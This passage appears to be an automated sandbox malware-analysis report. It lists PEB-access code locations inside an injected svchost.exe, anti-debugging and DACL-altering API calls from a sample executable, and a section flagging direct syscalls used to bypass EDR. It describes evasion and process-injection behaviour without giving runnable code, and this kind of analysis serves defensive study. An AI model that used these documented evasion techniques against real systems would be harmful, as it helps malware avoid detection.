            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]1_2_0312645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]1_2_0315245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]1_2_031BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]1_2_031EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]1_2_031644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]1_2_031BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]1_2_031364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]1_2_031304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]1_2_03204B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]1_2_0315EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]1_2_0315EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]1_2_031F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]1_2_031F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]1_2_03128B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]1_2_031DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]1_2_031E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]1_2_031E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]1_2_031C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]1_2_031C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]1_2_031FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]1_2_031D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]1_2_0312CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]1_2_03140BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]1_2_03140BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]1_2_031E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]1_2_031E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]1_2_031DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]1_2_0315EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]1_2_031BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]1_2_031BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]1_2_03154A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]1_2_03154A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]1_2_0316CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]1_2_0315EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]1_2_03140A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]1_2_03140A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]1_2_031ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]1_2_031ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]1_2_031DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]1_2_03168A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]1_2_03204A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]1_2_03138AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]1_2_03138AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]1_2_03186AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]1_2_03130AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]1_2_03164AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]1_2_03164AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]1_2_0316AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]1_2_0316AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]1_2_031BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]1_2_03128918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]1_2_03128918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]1_2_031AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]1_2_031AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]1_2_031B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]1_2_031C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]1_2_031B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]1_2_03204940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]1_2_031D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]1_2_031D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]1_2_031BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]1_2_031B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]1_2_031B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]1_2_031B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]1_2_031309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]1_2_031309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]1_2_031649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]1_2_031FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]1_2_031C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]1_2_031629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]1_2_031629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]1_2_031BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]1_2_031BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]1_2_0316A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]1_2_031D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]1_2_031D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]1_2_03160854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134859 mov eax, dword ptr fs:[00000030h]1_2_03134859
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_000D0B62
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000A2622
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0009083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0009083F
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000909D5 SetUnhandledExceptionFilter,0_2_000909D5
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00090C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00090C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
